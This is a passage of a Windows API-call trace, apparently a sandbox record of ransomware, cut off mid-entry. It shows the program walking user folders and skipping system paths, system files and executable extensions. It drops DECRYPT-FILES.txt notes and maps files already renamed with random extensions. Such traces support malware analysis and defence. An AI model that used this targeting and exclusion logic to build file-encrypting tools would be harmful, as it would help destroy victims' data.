huvuib.contact.U5MLwHG", cAlternateFileName="SIKVNB~1.U5M")) returned 0 [0184.687] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0184.687] CloseHandle (hObject=0x254) returned 1 [0184.687] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0184.687] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0184.687] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0184.687] lstrcatW (in: lpString1="Cookies", lpString2="\\" | out: lpString1="Cookies\\") returned="Cookies\\" [0184.687] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Program Files") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch=":\\Windows") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Games\\") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\All Users") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="AhnLab") returned 0x0 [0184.687] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.687] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned 38 [0184.687] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.687] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\\\0a16c9.tmp") returned 49 [0184.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0184.688] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned 38 [0184.688] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.688] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\\\DECRYPT-FILES.txt") returned 56 [0184.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.688] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned 38 [0184.688] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*" [0184.688] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xad8b6b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.U5MLwHG", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0184.688] CloseHandle (hObject=0x254) returned 1 [0184.688] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.688] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.688] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xae10b880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae10b880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0184.688] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0184.688] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0184.688] lstrcatW (in: lpString1="Desktop", lpString2="\\" | out: lpString1="Desktop\\") returned="Desktop\\" [0184.688] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.688] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Program Files") returned 0x0 [0184.688] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch=":\\Windows") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Games\\") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\All Users") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="AhnLab") returned 0x0 [0184.689] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.689] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.689] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.689] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\\0a16c9.tmp") returned 49 [0184.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0184.690] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.690] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.690] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\\DECRYPT-FILES.txt") returned 56 [0184.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.690] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" [0184.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf0ca0500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0ca0500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0184.690] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.690] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf0ca0500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0ca0500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.690] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.690] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.690] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0ca0500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0ca0500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0ca0500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.690] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.690] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.690] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.690] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.690] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.690] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.690] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.690] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.690] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.691] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0a16c9.tmp" [0184.691] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.691] CloseHandle (hObject=0x0) returned 0 [0184.691] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.691] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee17a70, ftCreationTime.dwHighDateTime=0x1d4cf4b, ftLastAccessTime.dwLowDateTime=0xdd80fd50, ftLastAccessTime.dwHighDateTime=0x1d4c5f3, ftLastWriteTime.dwLowDateTime=0xad902e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x93a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="127zrfgdW9q5BqzyAa.png.mcff", cAlternateFileName="127ZRF~1.MCF")) returned 1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="DECRYPT-FILES.txt") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="autorun.inf") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="boot.ini") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="desktop.ini") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="ntuser.dat") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="iconcache.db") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="bootsect.bak") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="ntuser.dat.log") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="thumbs.db") returned -1 [0184.691] lstrcmpiW (lpString1="127zrfgdW9q5BqzyAa.png.mcff", lpString2="Bootfont.bin") returned -1 [0184.691] lstrlenW (lpString="127zrfgdW9q5BqzyAa.png.mcff") returned 27 [0184.691] lstrcmpiW (lpString1="mcff", lpString2="lnk") returned 1 [0184.691] lstrcmpiW (lpString1="mcff", lpString2="exe") returned 1 [0184.692] lstrcmpiW (lpString1="mcff", lpString2="sys") returned -1 [0184.692] lstrcmpiW (lpString1="mcff", lpString2="dll") returned 1 [0184.692] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.692] lstrlenW (lpString="127zrfgdW9q5BqzyAa.png.mcff") returned 27 [0184.692] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.692] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="127zrfgdW9q5BqzyAa.png.mcff" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png.mcff") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png.mcff" [0184.692] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\127zrfgdW9q5BqzyAa.png.mcff" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\127zrfgdw9q5bqzyaa.png.mcff"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.692] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=37801) returned 1 [0184.692] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.692] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.693] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.693] CloseHandle (hObject=0x260) returned 1 [0184.693] CloseHandle (hObject=0x25c) returned 1 [0184.693] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.693] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aebda70, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0xa8bdcac0, ftLastAccessTime.dwHighDateTime=0x1d4c590, ftLastWriteTime.dwLowDateTime=0xad928fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf25c, dwReserved0=0x0, dwReserved1=0x0, cFileName="17tvF0H1H-L.mkv.hdzyF", cAlternateFileName="17TVF0~1.HDZ")) returned 1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="DECRYPT-FILES.txt") returned -1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="autorun.inf") returned -1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="boot.ini") returned -1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="desktop.ini") returned -1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="ntuser.dat") returned -1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="iconcache.db") returned -1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="bootsect.bak") returned -1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="ntuser.dat.log") returned -1 [0184.693] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="thumbs.db") returned -1 [0184.694] lstrcmpiW (lpString1="17tvF0H1H-L.mkv.hdzyF", lpString2="Bootfont.bin") returned -1 [0184.694] lstrlenW (lpString="17tvF0H1H-L.mkv.hdzyF") returned 21 [0184.694] lstrcmpiW (lpString1="hdzyF", lpString2="lnk") returned -1 [0184.694] lstrcmpiW (lpString1="hdzyF", lpString2="exe") returned 1 [0184.694] lstrcmpiW (lpString1="hdzyF", lpString2="sys") returned -1 [0184.694] lstrcmpiW (lpString1="hdzyF", lpString2="dll") returned 1 [0184.694] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.694] lstrlenW (lpString="17tvF0H1H-L.mkv.hdzyF") returned 21 [0184.694] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.694] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="17tvF0H1H-L.mkv.hdzyF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv.hdzyF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv.hdzyF" [0184.694] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\17tvF0H1H-L.mkv.hdzyF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\17tvf0h1h-l.mkv.hdzyf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.694] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=62044) returned 1 [0184.694] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.694] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.695] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.695] CloseHandle (hObject=0x260) returned 1 [0184.695] CloseHandle (hObject=0x25c) returned 1 [0184.695] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.695] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe161c200, ftCreationTime.dwHighDateTime=0x1d4c748, ftLastAccessTime.dwLowDateTime=0xde625ea0, ftLastAccessTime.dwHighDateTime=0x1d4d212, ftLastWriteTime.dwLowDateTime=0xad94f100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="3Evtxg4xh6 tW 9uys.bmp.EGUx8", cAlternateFileName="3EVTXG~1.EGU")) returned 1 [0184.695] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="DECRYPT-FILES.txt") returned -1 [0184.695] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="autorun.inf") returned -1 [0184.695] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="boot.ini") returned -1 [0184.695] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="desktop.ini") returned -1 [0184.695] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="ntuser.dat") returned -1 [0184.695] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="iconcache.db") returned -1 [0184.696] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="bootsect.bak") returned -1 [0184.696] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="ntuser.dat.log") returned -1 [0184.696] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="thumbs.db") returned -1 [0184.696] lstrcmpiW (lpString1="3Evtxg4xh6 tW 9uys.bmp.EGUx8", lpString2="Bootfont.bin") returned -1 [0184.696] lstrlenW (lpString="3Evtxg4xh6 tW 9uys.bmp.EGUx8") returned 28 [0184.696] lstrcmpiW (lpString1="EGUx8", lpString2="lnk") returned -1 [0184.696] lstrcmpiW (lpString1="EGUx8", lpString2="exe") returned -1 [0184.696] lstrcmpiW (lpString1="EGUx8", lpString2="sys") returned -1 [0184.696] lstrcmpiW (lpString1="EGUx8", lpString2="dll") returned 1 [0184.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.696] lstrlenW (lpString="3Evtxg4xh6 tW 9uys.bmp.EGUx8") returned 28 [0184.696] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.696] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="3Evtxg4xh6 tW 9uys.bmp.EGUx8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp.EGUx8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp.EGUx8" [0184.696] 